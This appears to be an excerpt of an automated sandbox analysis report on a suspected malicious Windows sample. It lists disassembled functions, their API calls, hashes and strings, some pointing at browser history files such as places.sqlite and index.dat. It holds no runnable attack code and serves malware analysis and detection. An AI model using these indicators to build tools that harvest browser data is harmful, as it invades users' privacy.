                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                              • String ID:
                                                              • API String ID: 1979745280-0
                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 2641622041-467022611
                                                              • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                              Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                              Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleSleep
                                                              • String ID: }A
                                                              • API String ID: 252777609-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • malloc.MSVCRT ref: 00409A10
                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                              • free.MSVCRT ref: 00409A31
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3056473165-0
                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 2445788494-0
                                                              • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
